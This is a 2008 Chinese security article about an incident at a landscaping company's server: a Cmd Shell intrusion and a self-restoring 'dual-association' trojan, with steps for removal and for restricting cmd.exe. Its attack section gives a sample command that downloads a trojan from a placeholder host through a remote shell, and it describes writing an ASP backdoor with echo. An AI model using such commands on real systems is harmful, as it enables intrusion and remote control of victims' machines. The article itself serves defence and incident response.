科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道剖析黑客的木马后门清除双关联木马

剖析黑客的木马后门清除双关联木马

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

清除木马只是被攻击之后的应急解救措施,学会方案二中如何防止Cmd Shell权限的丢失,不给黑客留下后门,才能保证重要数据的安全性。

作者:电脑爱好者 来源:电脑爱好者》 2008年9月17日

关键字: 黑客 攻击防范 木马

  • 评论
  • 分享微博
  • 分享邮件

  ★本文可以学到

  1.什么是Cmd shell?是如何被黑客利用的?

  2.如何清除双关联木马?

  ★必备知识

  1.什么是Shell?

  Shell的中文意思为“壳”,它管理着用户与操作系统之间的交互,可以把它理解为一个命令解释器。它接收用户命令,然后调用相关的应用程序来执行。

  2.什么又是Cmd Shell?

  Cmd Shell在这里可以称做系统后门,是黑客利用溢出或其他手段,获取目标计算机命令行的远程控制的权利。(Cmd即:用户在运行中输入“cmd”出现的命令行:如图1)

Cmd Shell

  3.Cmd Shell是如何被黑客获取的?

  Cmd Shell大多是当用户计算机存在漏洞时,黑客利用攻击工具进行远程进攻,导致计算机崩溃,从而丢失系统的控制权限(即Cmd Shell)。

  4.什么是双关联木马?

  木马在运行后生成两套完全相同的程序(名称和大小不一定一样),文中的“wlloginproxy.exe”程序(图2)和“services.exe”程序会互相扫描(每0.1秒扫描一次),如果发现对方没有启动或者运行时错误,其中一个木马程序会将自身复制,从新制造一个新的木马运行,导致用户无法完全删除。

木马在运行后生成两套完全相同的程序

  【略突出】案例

  时间:2008年2月18日

  负责工程师:孙佳兴(老孙)

  地点:青岛园林建设科技有限责任公司

  现场:公司3D园林规划数据服务器被入侵。黑客采用底层入侵技术,绕过了防火墙和杀毒软件,对服务器数据进行了远程植入木马,并窃取了大量高价值产品信息。

  【略突出】分析案例

  听完了青岛园林建设科技有限责任公司管理员的描述后,工程师老孙详细看了公司的服务器配置:

  服务器配置:主服务器为Window2003 SP1操作系统(补丁已经更新至2月11日最新微软安全公告提示)

  安装组件:IIS6.0(WEB网页服务)

  MS SQL2003(数据库)

  ISAServer2004(微软的企业级防火墙)

  Prowinde1.7.41(条件限制类杀毒软件)

  然后,他基本确认了黑客的攻击手段,做出如下分析:

  服务器采用企业版杀毒软件和入侵防火墙,限制了administrators和低级权限的运行文件的权利。黑客留下的痕迹证明:他采用的是溢出式攻击,并获取了高于administrators的权限。 

  小知识

  什么是溢出式攻击?

  溢出是黑客利用操作系统的漏洞,专门开发一种程序,加上相应的参数运行后,就可以得到你电脑具有管理员资格的控制权,等于你的电脑就是他的了。

  【略突出】攻!

  听完工程师老孙的分析后,公司网络管理员非常迷惑,到底黑客如何利用Cmd Shell下的远程控制进行传输,并进行后门植入的呢?

  【加细框】下段可以学到:黑客实现远程传输的两种方法

  老孙分析着残留的文件,基本推测出了黑客的攻击方式:

  第一种方法:利用Echo命令写ASP后门。

  小知识

  Echo命令小解

  主要功能:简单点说就是开启或关闭批处理命令行在屏幕上的显示,属于内部命令。内部命令就是常驻于内存的命令,在任意路径下输入均可执行。

  目的:一是避免不需要的命令显示来干扰屏幕;二是在屏幕上给用户显示提示信息。

  此方法原理:由于目标主机上已经安装了IIS服务,黑客在拥有Cmd Shell的情况下,利用Echo命令制造一个允许传输的ASP后门木马,来管理被入侵的计算机。

  第二种方法:利用Cmd Shell结合网页进行远程传输。

  由于黑客在入侵完成后删除了大部分日志,老孙推测还有另外一种方法也可以实现入侵:利用“开始→运行”,输入“cmd”打开命令提示符,输入“start”命令,将木马自动下载到网页缓存中。

  例如:start itshttp://www.xxx.com/hack/ps.exe

  在远程Shell中执行上面这个命令后,“ps.exe”已经下载到目标主机的网页缓存目录中了。然后继续通过Cmd命令获得“ps.exe”的具体位置。

  小提示

  对于以服务为启动方式的后门所提供的Shell,其用户身份一般都是System。

  由于黑客在入侵时候会启动一个IE进程,如果是System身份的Shell,就不会在本地出现窗口,(这种情况符合黑客的入侵行为,避开了防火墙的权限限制)。

  【略突出】防!

  入侵分析结束了,接下来就是要解决黑客留下的后门木马。由于木马采用了双关联保护结构,为了清理后门并避免以后再出现类似入侵,老孙还特意做了一份详细的解决方案。

  【加细框】下段可以学到:双关联木马为什么难以清除

  黑客在入侵后种植的后门木马程序运行后会生成三个文件,分别是:

  C:/WINDOWS/wlloginproxy.exe

  C:/WINDOWS/Explore32.exe

  C:/WINDOWS/system/services.exe(图3)

伪装进程

  这三个文件用的都是HTM文件图标,千万不要以为它们是HTM文件!如果你的系统设置为显示所有文件的扩展名,看看图4,你会发现它们都还有个“.exe”的尾巴,这说明它们是可执行文件!

扩展名里有猫腻

  这三个文件又分别起什么作用呢?“wlloginproxy.exe”文件用来在启动时加载运行,它是守护进程!

  小知识

  守护进程:

  对木马来说,如果客户端向服务端的某一特定端口提出连接请求,服务端上的相应程序就会自动运行,来应答客户端的请求,我们称这个程序为守护进程。

  “Explore32.exe”和“services.exe”是干什么的呢?呵呵,它们分别用来和HLP文件(帮助文件)、TXT文件(文本文件)关联,如果你发现并删除了“wlloginproxy.exe”,并不会真正清除了它。一旦打开帮助文件或文本文件,“Explore32.exe”和“services.exe”将被激活!它将再次生成守护进程“wlloginproxy.exe”。这就是服务器一旦被种植了双关联木马,就很难清除干净的原因!

  【加细框】下段可以学到:双关联木马的清除方法

  老孙的方案一:彻底清除双关联木马

  1.删除文件

  先删除C:/WINDOWS下的“wlloginproxy.exe”和“Explore32.exe”文件,再删除C:/WINDOWS/system下的“services.exe”文件。如果服务端已经运行,那么就得用进程管理软件找到“wlloginproxy.exe”这个进程,然后点击“终止”,再到C:/WINDOWS下将它删除。

  网络大补贴

  推荐两款进程管理软件:

  (1).大而全:Windows进程管理器 v4.01,提供了700余种进程信息,以颜色分类。下载地址:http://down1.tech.sina.com.cn/download/downContent/2005-12-13/16432.shtml。

  (2).小而精:Evonsoft Tool汉化绿色版,界面清爽,操作简单。下载地址:http://down1.tech.sina.com.cn/download/down_contents/1223740800/41185.shtml。

  2.注册表中删除

  点击“开始→运行”,输入“regedit”打开注册表,到注册表中来删除木马的自启动文件:

  [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]

  "MainBroad BackManager"="C://WINDOWS//wlloginproxy.exe"

  3.恢复TXT文件关联

  先下载恢复文件关联的注册表文件(http://work.newhua.com/cfan/200807/恢复REG.rar下载),解压。双击“恢复txt.reg”,点击“确定”导入注册表,将TXT文件关联恢复。

  4.恢复HLP文件关联

  双击上步中解压出来的“恢复htp.reg”,点击“确定”即可。

  下段可以学到:防止Cmd Shell权限丢失的方法

  老孙的方案二:预防Cmd Shell权限的丢失

  小提示

  Cmd Shell的获取大多是利用溢出攻击实现的,经过手工设置可以对溢出攻击进行有效的防御。

  1.对于Windows 2000/2003系统,打开C:\WINNT\System32(系统安装在C盘),找到“cmd.exe”,用右键选择“属性”项,在“安全”标签下修改“cmd.exe”的访问权限,只保留刚刚新建立的用户对“cmd.exe”的完全控制权限,将其他用户全部删除,尤其是Everyone。

  之后,找到“net.exe”文件,按照上述方法进行设置。如果还发现了“net1.exe”,也要设置一样的权限。

  2.在Windows XP下,“cmd.exe”的“属性”选项里已经没有了“安全”标签。可以点击“开始→运行”,输入“gpedit.msc”,打开“组策略”窗口。在组策略中,依次展开“计算机配置→Windows 设置→软件限制策略”,右击后,选择“创建新的策略”。然后,继续展开“软件限制策略→其他规则”项,右击该项,选择“新键散列规则”。在弹出窗口中点击“浏览”按钮,选择C:\WINNT\System32下的“cmd.exe”文件,设置“安全级别”为“不允许的”。

  对“net.exe”文件执行同样的操作,进行限制,如图5。

图5 加以限制

  总结

  清除木马只是被攻击之后的应急解救措施,学会方案二中如何防止Cmd Shell权限的丢失,不给黑客留下后门,才能保证重要数据的安全性。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章